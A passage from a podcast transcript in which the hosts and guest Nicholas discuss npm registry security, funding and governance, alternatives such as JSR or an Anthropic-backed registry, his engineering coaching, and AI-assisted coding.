So like that story was just not there at all.
It was okay if you were just building an application
that you were not going to be publishing to NPM,
you're just going to be deploying, like that worked okay.
But then going and publishing that back to NPM just did not work at all.
So we're stuck.
Yeah.
I don't know.
I got an idea.
All right.
Let's hear it.
What if, and I know Bun is not a registry, but what if Bun is very fast,
what if by the sheer weight of Anthropic behind Bun now,
saw this as a blind spot in an opportunity?
They obviously invested in Bun anyways.
I'm not sure of the implications behind it.
There's a lot of speculation, of course.
But with the sheer weight they have with just the weight,
their deep coffers, their money, et cetera,
what if they can recreate what MPM is?
They're already MPM compatible.
What if they could redo, but better,
with maybe AI, native, provenance, et cetera,
anomaly detection, take your advice, Nicholas, et cetera.
Like, what if they took it on and they said, you know what, we're going to do this?
Could they sway all the maintainers away from NPM by the sheer weight of who they are right now?
I don't think so.
Okay.
And part of the reason is it seems like a lot of developers are very skeptical of AI companies and providing
data that can be used to train AIs.
Like there's, there was a lot in 2025 of people being like, oh, look at this, like, terms of
service, they've now included that your data can be used to train AIs.
And I feel like if Anthropic were to start a registry, that would be like day one, people
being like, wait a second, am I just feeding Anthropic, like my copyrighted material so it can
continue to train Claude. I think that would be a major barrier to that. I think that's a fair
point. Yeah. What about they just, what about the users? You know, all they need to do is convince
Claude to use their registry and then the rest of us are just riding, you know, we're just riding
Claude's back anyway at this point. Really? Yeah. Well, I think it would be interesting if,
if they started having Claude say like, no, you've got to use the Anthropic official registry.
But I could also imagine, you know, similar upset developers.
User backlash against Claude now.
Yeah, totally.
Yeah.
And also just, you know, from an operational standpoint, I don't know that Anthropic
has the operational experience to be able to keep a high volume registry up and running at this point.
I mean, that's something that, I mean, there were really smart people.
Explain that.
What does it take to do that?
I would be lying if I said I knew exactly.
Okay, so you're speculating.
But, well, no, because I know, like, I knew a bunch of the people who started NPM Inc.
We worked together at Yahoo.
Really, really smart people coming from Yahoo that had really, really good operational systems
and being able to pull people, you know, from that ecosystem in to help build up NPM.
I mean, people forget now, but, like, the NPM register used to go down a lot in the early days.
And even after they got their funding, like, it took a while before it reached stability.
And there's, you know, a lot of, again, I'm not going to lie and say I know how to keep a registry online myself
because I've always been more of a front-end developer than a back-end developer.
But just, you know, off the top of my head, how many, like, read replicas that you need and where you need them,
what sort of traffic are you getting from publishing and how frequently,
and how do you cash effectively to make sure that CI systems are up to date and also not unstable.
There's a lot that goes into managing the registry.
I would say, you know, it's probably kind of similar to like running YouTube in a way.
Because YouTube, before they got bought by Google, like this was also a problem of just like managing the scale that was going on.
and part of why Google was an ideal destination for YouTube
was they had the infrastructure and the operational knowledge
in order to keep that site up and running,
even with all of the traffic and all the bandwidth that it eats up every day.
And again, if you look at Claude, like,
how frequently does Claude go down
because they run into, like, bandwidth issues?
Like, it still is more frequently than you'd like to admit.
They're getting better,
but like it still happens.
So you're not down with,
you don't think the world will be down with
Anthropic slash Bun registry,
NPM compatible,
anomaly detection,
AI native,
et cetera, et cetera, et cetera.
I don't personally.
I think that for a registry
to have a chance to compete with NPM,
I think it has to come from a company
or a person starting a company that is already trusted by the community.
And that's why I thought JSR had a real shot.
Because coming out of Dino, coming from Ryan Doll,
already had like a lot of trust in the community
and, you know, always presenting himself as like wanting to do the right thing
for the JavaScript ecosystem,
I thought JSR really had that shot.
And to see it kind of fade away,
has been really disappointing.
Well, I think JSR was open source and supposed to be...
It is.
Like you said, governed open.
So there's opportunity for somebody else to pick up the mantle and run with it if there's no movement from the Dino team any further.
If we look around all these different package ecosystems, like how do they all do it?
Or is NPM at such scale that it doesn't really matter?
how Ruby Gems does it,
how Pearl continues to do it.
I know Pearl has like C-PAN,
which is mirrored around the world on different servers.
Rust, I think, is the Rust Foundation,
but it's like way smaller in terms of how many crates there are
compared to NPN packages.
Java, I think Java isn't Maven run by like a single entity
that sells commercial services.
Are these all just like the scale isn't the same
it doesn't really matter how they're doing it successfully,
or what are your thoughts on that?
Yeah, I think that's exactly it.
I think it's a scaling problem
because there are package managers around
before NPM existed.
And, you know, Ruby Gems.
So, crates came around
afterwards and was kind of inspired by NPM,
but, like, they don't have anywhere near the scale.
No, but what about PaiP?
for instance. Like, Python has huge scale.
Yeah, I don't know that much about the Python ecosystem.
I mean, neither knows the Python's foundation.
Python what foundation?
Yeah, it seems to me these other languages usually follow a predictable pattern of,
at some point, some developer was like, we need a package manager.
They made one.
People started using it.
They started a foundation or nonprofit or something.
that just kind of gets donations to keep it up and running.
And I think that that's where the JavaScript story kind of went sideways
of like it was started as a side project by Isaac Schluter.
And trying to find a home for that, he started NPM Inc, a for-profit business.
And I think that that was probably the point at which
the divergence from other languages hurt the long-term plan for the registry.
Because again, once you become a startup, you take VC, you're on the hook for making money,
you're figuring out how.
And then if you can't figure out how they want you to sell to try to get as much money as possible,
get it back, like maybe in some ideal world.
the NPM registry would have ended up instead of at a for-profit company in, you know, at the time, the JQuery Foundation, which went on to become the Openjs Foundation.
Right.
I think that an ideal world that is probably what would have happened, although I don't know, you know, ESLent is part of the OpenJS Foundation.
So I do have some insight into how the foundation works.
And I also don't know how the foundation would have been able to afford to keep the registrar.
running. Probably the same way any foundation does is just donations. They'd have to just beat the
streets for bigger donations from funded companies that really want JavaScript to win, like Google,
for instance. When the web wins, Google wins, at least historically. Yep. And so they would be probably
a sponsor. And it would just be like, let's just break even and continue to break even and pay these
bandwidth and costs and AWS costs or whatever it takes to run the thing. And that's how they're all
running, but like you said, the scale is bigger than the more.
I did confirm Python Software Foundation.
I'm not sure what I was talking about with Python Science Foundation.
The PSF has oversight and donations.
Sponsorships, AWS Google Data Dog, provide 10,000.
Fastly provides $10,000 per month hosting.
That's just reading this from a LLM lookup.
So fact check that, but it makes sense.
That's the way it's working.
It probably doesn't always work great.
I'm sure there's push and pull on the direction and there's quite drama around all the things.
But like that's kind of how community run important things are maintained and continue.
But they don't have the profit motive behind them.
And so I think you're right on track there with like turning it into a business.
It's probably a long term death now.
And here we are.
And had it gone to the Openjs Foundation versus two gifts.
hub perhaps that would have killed it off for good or perhaps it would have given it a better
chance. I don't know. Obviously we can't do the parallel histories, but it seems like it's not
and it's in an okay place. It continues to exist. It operates pretty well. But it's so important
now that the stakes have been, you know, ratcheted up on the security side. And there are more
things that need to be done. And there's really not much of incentive besides, like you said,
some pending nuclear moment of terrible press and like user backlash. And, like, user backlash.
and all these things, a huge security breach, perhaps legal action,
that would actually motivate them to really go after it.
Or just the cool factor, man, just the cool factor of implementing anomaly detection
and like these verified users and like that would be, that'd be a fun job, you know, to save.
Potentially, I mean, it's not a save because, I mean, you're going to keep using it,
but you're going to using it begrudgingly.
You're not exactly thrilled that your NPM is not as secure as it should be.
scared yeah all you got it's your only options like the road to there is paying with potholes and
thieves and you know people with weapons and stuff trying to take me out it's like that's not a good
road that's an exaggeration of course but uh you know you've only got the one road to go down and not much
choice and even if there was choice based on what you've said nicholas is that even with that choice
there might not be a mass uh exodus away from mpm to something else just because of it
It's gravity.
I mean, the packages behind NPM is three point, I mean, if this math is correct, as of late 2005, 3.1 million packages.
This is according to Wikipedia.
So, Wikipedia is better.
I mean, that's a lot of packages.
That's a lot of people to move.
I mean, you don't want to swap out your just-in-time credentials, let alone move to something else with maybe different tooling, maybe better tooling.
Who knows?
Yeah, they have to have a good reason.
Yeah. And security rarely moves people very fast or far.
It might this community, though.
I mean, if there's a lot of fear of its uncertainty because of security in particular.
It seems like the profit incentive could be there, though.
And when you see companies like volts and companies like socket springing up basically because of these problems.
Right.
It seems like there's some possibility there of GitHub just saying, like, look, there are companies that are willing to pay for these types of services.
Like, maybe we can offer those services and use that to offset some of the cost of implementing these changes on NPM to say, hey, if you want the fastest notification of potential security threats or what have you,
you sign up for the service,
we're going to use that money,
funnel it into the NPM team,
and start funding it that way.
I feel like there's a lack of creativity
in the solutions at this point.
Because there's a whole world of possibilities out there
to be able to turn NPM from just like a cost sink
into something that could maybe break even
or maybe, maybe,
at least just not be the albatross that you're dealing with constantly.
Like, I think it's wishful thinking at this point that GitHub would willingly spin off NPM
into a foundation. I mean, they could certainly do it.
Like, it wouldn't hurt them financially to just say, hey, you know what?
We want to start a foundation or give it to the Openjs Foundation.
As part of that, we've come to an agreement with, you know, Google and meta and whoever,
else that we're going to jointly fund registry operations by donations to the Openjs
Foundation.
The Openjs Foundation will be in charge of hiring engineers to work on it based on that.
Maybe that's an offer-in for them.
I don't know if they'd be open to that.
But there's just, there's a lot more options out there than I think are being discussed
or even considered at this point.
for sure for sure let me take this as an opportunity to invite anybody who has insight into the underpinnings the behind the scenes of npm open invite come on let's talk about whatever you want to talk about let's even spit up some ideas live here on the podcast maybe we even spin up a clod code session and whip up a new feature for you who knows what i'm trying to say we'll get some we'll get some action here i'm going to say get nicholas hired on there to come in and write the ship you know bring him in and bring him in and
He's got good ideas.
Would you do that, Nicholas?
Hey, happy to.
If I can help.
There you go.
I'm out here willing to help.
Yeah, what is your day?
What is your day-to-day look like?
What are you up to?
Well, I'm at the moment independent software engineer.
So I just take on contracting, consulting work.
I work on ESLint as I'm able.
And I do coaching for software.
for engineers, just helping people
when they kind of reach those
upper levels of the IC track,
tech lead, staff engineer, principal
engineer, which I did
in a former life,
just helping people kind of navigate
companies and leadership
and communication and politics
and all the things.
Is that one-on-one? Is it a small group?
How does that work out?
Yeah, it's one-on-one.
Just do remote Zoom calls.
and yeah, just talk about the challenges people are having
and give some tools and suggestions
of how to deal with situations that might come up
because anybody who became a tech lead,
they'll know that basically when you become a tech lead,
they say, hey, congratulations, you're a tech lead,
go do tech leading stuff,
and don't really tell you what that entails.
So that's when I come in and just help people figure out,
out how to work effectively in those roles and, you know, manage your manager and get stuff done.
How likely is that that person is already employed and a tech lead? And they're just like, hey,
can, now that I get this role, can I use some discretionary spending for some leveling up?
Yeah, that's 100% of the people that I work with are people who are already employed at a company.
A lot of times a company will even pay for the coaching through their professional development,
expensing. And, you know, sometimes the managers reach out to me and just say, hey, I have this
person that I'm working with, that I really like to get them some coaching, either because
they just don't have more senior people at the company. Like I work with a lot of startups
that just don't have those really senior people that can help mentor people. Or sometimes
the really senior people are just too busy, don't actually have the time to sit down and
do that sort of coaching and mentoring.
Sometimes it's the engineers themselves who reach out.
And I always encourage them to talk to the manager to see if they have professional
development funding that might be able to pay for it too, because if the company is going
to benefit from you becoming a better employee, then it seems only fair that they should
pay for it, too.
Well, how can they reach out to you?
What's the best way to say, hey, Nicholas, I need some help.
Yep.
So you can drop by my website.
It's at human who codes.com slash coaching.
And that'll give you all the information about what I do, how it works,
you can see some testimonials.
And there's a button for you to apply and fill out a form that just tells me about you.
And I can figure out if it would be a good fit.
Because I'm one of those people who I want to make sure I can help you with the situation
that you're dealing with.
And if not, then I'll try to help you find somebody who can.
And how should GitHub contact you to come help fix NPM security?
The same way.
Slash coaching, yo.
Pay the bills.
The folks at GitHub, I'm in a Slack with them already so they can reach out at any time.
A DM near you.
All right, Gidav.
The tables are turned back to you.
Come on the pod.
Let's talk about NPM or reach out to Nicholas, whichever you prefer.
That's your next move.
There you go.
Let's make it happen.
Nicholas, anything else on your mind,
anything else you want to talk about?
It could be on topic, off topic,
regarding what's going on in software world or anything before we let you go.
Yeah, I just wanted to say about AI.
I don't think it's hype.
I still see people out there saying,
oh, this is just a hype train.
Personally myself, I have seen like a 10x productivity improvement.
in the amount of code that I can now generate versus writing.
And especially when you're like jumping around from project to project,
saving me a ton of time.
It would be really difficult for me to be productive writing code for ESLint right now.
But with AI, like, hey, you know, I know what I need to get done
and I can describe it fairly quickly
and just kind of let AI go off and do it.
So if you're one of the stragglers out there
who's still not embracing AI in your day-to-day,
like 2026 is the year.
You've got to start doing it now.
2026 is the year.
There you go.
How about resources for maintainers
who have to maintain MPM modules, packages, whatever?
Do you have any resources for them,
any advice for them?
Maybe they're not paying attention as much as they should,
to the details, where could they go to become leveled up?
Yeah, that is a good question that I don't know I have an answer to.
I love to see that resource exists, because I feel like that's just like a natural thing too.
Because, I mean, NPA, I don't even, I don't know.
I don't know NPM's docs, but I would imagine like that's the need there,
but they're already not doing the other things as well as they could.
So let's just do those things better.
Yeah.
But the docs can be, you know, maintainers out there who've been down the road,
have the bloody knuckles and the scars to prove it.
and the backward-facing desire for everyone else following them
or following NPM or the ecosystem
to be leveled up in some ways you're perform.
I'd love to see that happen.
So if you're out there doing something like that,
or you got that resource or that's your next big AI-generated things.
I mean, that really could be something you can AI generate over a weekend.
You can invent 100 new docs that were never there with a few prompts
and your new buddy Ralph and Claude just circling around whatever.
get it done.
If I'm remembering correctly, I think OpenJS Foundation might have put out something along
these lines.
Just not 100% sure.
Very cool.
Well, Nicholas, thank you for coming on the pod, sharing your time again with us back here
on the changelog.
And thank you so much for your angst in sharing that.
And just pushing the needle on what could be a secure MPM coming to you sometime soon.
Thanks for having me.
All right, that's your change log interview for this week.
Thanks for riding along with us.
What do you think about NPM?
Is it being neglected?
Is there a way to save it?
Are we being overly dramatic?
Let us know in the comments.
Links in the show notes.
Thanks again to our partners at fly.
To breakmaster cylinder for the beats and to you for listening.
We appreciate you more than you know.
That's it.
This one's done.
But on Friday, come on back.
talking Claudebot slash Multbot, personal software and the death of software as a service.
Talk to you then.
